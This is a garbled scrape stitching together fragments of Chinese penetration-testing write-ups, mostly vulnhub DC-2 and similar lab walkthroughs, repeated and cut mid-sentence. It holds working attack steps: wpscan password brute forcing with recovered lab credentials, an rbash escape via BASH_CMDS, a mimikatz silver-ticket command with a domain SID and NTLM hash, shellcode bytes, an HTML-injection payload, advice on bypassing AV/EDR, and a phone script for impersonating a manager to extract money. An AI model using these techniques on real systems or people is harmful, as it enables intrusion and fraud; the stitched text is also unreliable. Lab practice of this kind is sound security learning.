%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsUpload&download_url=http%3A%2F%2Fwww.talk915.com%3A13148% 2FresourceProxy%2FfdfsDownload%3FFILE_ID%3D&pathUrl=http%3A%2F%2Fwww.talk915.com%3A80%2F&userToken=&searchWhere %2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsUpload&download_url=http%3A%2F%2Fwww.talk915.com%3A13148% %2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsUpload&download_url=http%3A%2F%2Fwww.talk915.com%3A13148% =1234"%20%2f%3e%3ca+href%3d%22http%3a%2f%2fwww%26%23x2e;bing%26%23x2e;com%22%3emore+result%3c%2fa%3e%
这时候突然想到一个解决方案,那就是Python2中的raw_input()函数,Python3中和input()合并了,但是相比于后者,raw_input()返回的是字符,如此以来只需简单的修改代码,就可以 ,我们在Python2的环境中运行即可。
cewl -w dc2.passwd.txt http://dc-2 图片.png 然后wpscan扫描用户。 wpscan --url http://dc-2/ --enumerate u 图片.png 三个用户。admin,jerry,tom 之后根据生成的密码文件和用户爆破密码。 wpscan --url http://dc-2/ -U tom -P "dc2.passwd.txt" 爆破后得到两个账号密码: Username: tom, Password: parturient 图片.png 找到了flag2。 再用ssh登陆。 图片.png 信息收集看看。 图片.png 被~rbash阻挡了。 绕过它。 tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a $ /bin/bash tom@DC-2:~$ ls flag3.txt set usr tom@DC-2:~$ cat flag3
1.4 收集常用端口信息 在渗透测试的过程中,对端口信息的收集是一个很重要的过程,通过扫描服务器开放的端口以及从该端口判断服务器上存在的服务,就可以对症下药,便于我们渗透目标服务器。 所以在端口渗透信息的收集过程中,我们需要关注常见应用的默认端口和在端口上运行的服务。 在渗透测试中,对目标服务器进行指纹识别是相当有必要的,因为只有识别出相应的Web容器或者CMS,才能查找与其相关的漏洞,然后才能进行相关的渗透操作。 2.判断目标是否使用了CDN image.png 如果我ping我自己的网站,在没有套CDN的情况下,是这样的情况。 image.png 如果这里ping百度,我们就可以看到该网站使用了CDN。 2.个人冒充——伪装欺骗她 这点,就得看演技了。 冒充上级领导打电话,“小张,我是**,在外面采购,钱不够了。你现在给我转1000块钱过来,等下你去找财务报销”。
禁用AV/EDR产品在实践中绝不是一个好主意,最好的办法是绕过它。所有这些命令都需要本地管理权限。
今天来搞DC-2这个靶机,下载地址https://download.vulnhub.com/dc/DC-2.zip,这个靶机与DC-1一样,最终目标是拿到root shell,作者为了降低单独设置了4个 登录网站后台,找到flag2。 ? 查看flag2的内容,提示除了搞定WordPress外,还有另一个途径。 ? 利用vim进行绕过,方法与我第一篇文章《第一次vulnhub靶机的渗透》差不多,先利用vim打开一个文件。 ? 然后在vi中获得一个新shell。 ? ?
说明 由于最近一段时间都在准备大二上学期推迟的期末考试,所以导致安全方面的学习的文章没有持续更新,对于内网渗透来说,我还是比较喜欢搞的,一是知识点概括比较全,能够让自己在渗透的同时学到很多的东西 这篇文章主要就是为了记录在DC-2的渗透过程中的所有步骤,如果有什么地方出错,还请师傅们斧正。 发现了flag2 ? 绕过shell限制 看到flag2的提示,我们需要另外找方法去继续进行下面的渗透,想起来上面我们看到了一个7744的 端口是ssh服务,又加上我们爆破出了tom和jerry两个账户的密码,我们可以尝试使用这两个用户来 然后在虚拟机里登录DC-2.
简介 Metasploitable2虚拟系统是一个特殊的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最核心是可以用来作为MSF攻击用的靶机。 渗透细节 环境 攻击机:kali 192.168.222.132 靶机:Metasploitable2 192.168.222.131 漏洞列表 1、弱口令漏洞(如vnc、mysql、PostgreSQL 等) 2、Samba MS-RPC Shell命令注入漏洞 3、Vsftpd源码包后门漏洞 4、UnreallRCd后门漏洞 5、Linux NFS共享目录配置漏洞 6、Java RMI 后门漏洞 14、Rlogin后门漏洞 服务扫描 db_nmap -sS -sV -n 192.168.222.131 端口开了很多,对应的服务名字也展示出来了,这个地方利用这些服务作为突破点去进行渗透 6667/6697端口 IRC服务, IRC服务这个版本存在后门漏洞,直接exp后getshell 8180端口 tomcat服务 弱口令:tomcat:tomcat 以上就是matasploitable2的相关漏洞
使用netdiscover探测内网存活主机 2. PHPMailer的漏洞反弹得到shell 3. Python版的EXP修改 4. 利用带有suid标志的find命令进行命令执行拿到root shell 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova Raven 2是一个中等难度的 boot2root 虚拟靶机,在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵。 2. 发现2个flag ? ? 那么现在就剩最后一个FLAG了,应该就在root目录里面。
---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com /dc/DC-2.zip 涉及的知识点: 工具:nmap,cewl,wpscan git提权、rbash绕过 渗透流程 这里小结一下流程,下面再详述具体内容: 通过修改hosts进入网站,发现flag1 dc-2. index.php/wp-json/wp/v2/users/? ssh登录 既然已经得到了2对账号密码,直接去试试ssh登录到主机吧 jerry的账号登录失败: root@ptlab:~/dc:2# ssh dc-2 -p 7744 -l jerry The authenticity
Preface 本篇文章记录为vulnhub系列DC2,练习过程中也参考了其他大师傅的文章,加上个人的一些思路见解就有了此文,个人拙见定会有出错,还请各位师傅们指正。 参考文章 Process 信息搜集 靶机搭建完成以后发现无法访问正常页面,根据提示应该是无法将地址解析到域名,我们需要在本地hosts文件末尾添加一条解析记录 靶机IP dc-2 hosts是一个没有扩展名的系统文件 cewl http://dc-2 w dc-2_password dc-2_password为要保存的搜集结果的文件名 接下来就结合wpsan里面的爆破模块开始爆破。 wpscan --url http://dc-2 -P dc-2.password -U admin U1: tom P1: parturient U2: jerry P2: adipiscing 获得root权限以后目的其实就已经达成了,但还是看一下最后的flag吧 至此本次渗透测试练习就完成啦!
内网渗透msf渗透开启监听之后,成功获取shell。迁移进程接着进行迁移进程,然后尝试进行进程注入。抓取hash使用msf内置的抓hash命令,进行抓hash。 尝试内网渗透。域信息收集使用cs的基本功能收集端口和主机地址。接着进行抓取凭证。横向移动使用psexec进行横向移动。获取域控成功通过抓取到的hash横向到域管接着继续横向,横到了另一台主机。 :de1ay域计算机名称:web.de1ay.com域SID:S-1-5-21-2756371121-2868759905-3853650604-500服务账号NTLM hash :73805069e2c7227f110772875f1b0e41
内网渗透 msf渗透 开启监听之后,成功获取shell。 迁移进程 接着进行迁移进程,然后尝试进行进程注入。 抓取hash 使用msf内置的抓hash命令,进行抓hash。 尝试内网渗透。 域信息收集 使用cs的基本功能收集端口和主机地址。 接着进行抓取凭证。 横向移动 使用psexec进行横向移动。 的mimikatz获取sid) 白银票据: 前提: 已经控制了域控并且使用域管理员登录或者提权的system 我们的目的是去访问windows server 2003 的机器 条件如下: 1.域名 2. de1ay 域计算机名称:web.de1ay.com 域SID:S-1-5-21-2756371121-2868759905-3853650604-500 服务账号NTLM hash :73805069e2c7227f110772875f1b0e41 armandhenewpy /domain:dc.de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604-500 /rc4:73805069e2c7227f110772875f1b0e41
Kn0sky ---- 环境准备 DC:2靶机 Kali linux DC:2靶机 下载地址: http://www.five86.com/dc-2.html https://download.vulnhub.com /dc/DC-2.zip 涉及的知识点: 工具:nmap,cewl,wpscan git提权、rbash绕过 渗透流程 这里小结一下流程,下面再详述具体内容: 通过修改hosts进入网站,发现flag1 dc-2. index.php/wp-json/wp/v2/users/? ssh登录 既然已经得到了2对账号密码,直接去试试ssh登录到主机吧 jerry的账号登录失败: root@ptlab:~/dc:2# ssh dc-2 -p 7744 -l jerry The authenticity
执行下一条指令,查看栈内容,栈顶地址为ffffd2ec,值为56556286,没问题 ? 继续执行到printf之后,ret之前的断点,查看ffffd2ec处的值,已经变成了41414141,说明溢出已经成功,返回地址已经被修改 ? 接下来回头找一下40个A是从哪个地址开始填入的,并记下这个地址,以便做为替换后的跳转地址,在下图可以看到这个地址为ffffd2c8 ? 来写一个python脚本生成新的填充字符,内容是编码后的shellcode+填充A+返回地址ffffd2c8 ? 执行一下,已经获得了root的shell,进入/home/level2目录,得到了level2的密码和levelThree的可执行文件 ?
靶机介绍 这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。 ip对应域名 win10路径:C:\Windows\System32\drivers\etc\hosts linux路径:etc/hosts 渗透实战 查看页面为wordpress的cms且页面有flag cewl http://dc-2 -w passwds.txt 用wpscan进行用户爆破 wpscan --url http://dc-2 -U users.txt -P passwds.tx [i -s 7744 ssh -vV [7744][ssh] host: dc-2 login: tom password: parturient 登录ssh ssh tom@dc-2 -p 7744 tom@DC-2:~$ whoami -rbash: whoami: command not found tom@DC-2:~$ pwd /home/tom tom@DC-2:~$ ls flag3.
Ret2Text With Environment ? 上图为r00t1,没有交互不像是存在溢出或者格式化字符串的情况。 现在看一下r00t2: ? 若开了ASLR其实我们也可以用传统的ret2libc来完成攻击。 Ret2Shellcode ? ? r00t1 没什么东西,看r00t2: ? 明显栈溢出。 ? ? ? \x45\x15\x83\xc5\x04\xe2\x2c\x9d\xa9\x81\x57\x30\xc8\x59\x4a\xd6\x9d\x7d\xfc\x37\xed\xe9\xfc\x2f\x3e\ x88\x95\xc1\xc9\xaf\x37\xf6\xc2\x2f\xb7\x06\xfc\x4d\xde\x68\x2d\xe1\x48\x75\x66\x56\x01\x94\x45\xd8"' 0x06 Summary 信息收集在本次渗透中仍有着极大的作用,再一个是终于碰到缓冲区溢出了。其中缓冲区溢出的原理及基本思想这里一言半语的也说不清,有PWN基础的应该都可以看得懂。
/上级目录 常见的CMD命令 1. dir 查看当前文件夹目录 2. cd 切换到指定目录 cd ../ 切换到上级目录 3. shutdown -t 0 -s 关机 shutdown -t 0 -r 某个内部存在的地址 内网地址例如: 10.0.0.0~10.255.255.255 172.16.0.0~172.31.255.255 192.168.0.0~192.168.255.255 IPV4有2的 3389端口:远程桌面服务 3306端口:数据库端口 端口查看: netstat -a -n 从访客角度查看网页浏览流程 1.用户在浏览器输入 协议://域名 例如:www.shirong.ink 2.
2 内容速览 0x00前言 这是网络安全自修室每周带星球小伙伴一起实战的第2台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知! 靶机可从Vulnhub平台免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标! | Username: tom, Password: parturient 通过jerry用户登录后台发现flag2 如果无法渗透wordpress,或者后台无上传点,提示走别的切入点 所以尝试hydra 发现是一个受限的rbash, rbash是受限的shell的一种此外还有rbash、rksh和rsh,为什么要对shell进行限制呢,有以下几个原因: 提高安全性,防止黑客和渗透测试人员的入侵 限制一些会对系统造成危害的危险命令 为了提高渗透测试人员的个人能力,在一些靶机上设置受限的shell让测试人员绕过拿flag 直接rbash绕过获取到flag3.txt内容 tom@DC-2:~$ BASH_CMDS[a]=/bin/sh
目标主机信息搜集的深度,决定后渗透权限持续把控。 渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。 持续渗透的本质是线索关联,而线索关联为后续的攻击链方提供了强大的方向。 后渗透的本质是权限把控,而权限把控为后渗透提供了以牺牲时间换取空间强大基础。 靶机背景介绍: ? ,脱网机 主机C: Windows 2008 x64 域控,存在ms14-068漏洞,脱网机且A1,A2,B,C系统主机密码均为强口令 A1,A2,B,C为标准ABC类网,允许访问流程,A1---->A2 发现A2全补丁,放弃提权,(weblogic为user权限)对内信息刺探A2,得到weblogic相关配置文件,解密后,得到密码。 ? 引言(2): 渗透测试过程,提权是非核心任务,这里也不建议尝试提权,因为在实战过程中获取某个“点”的权限,过程是及其漫长以及困难的,不要因为某个大胆的尝试,而影响了整个渗透测试流程。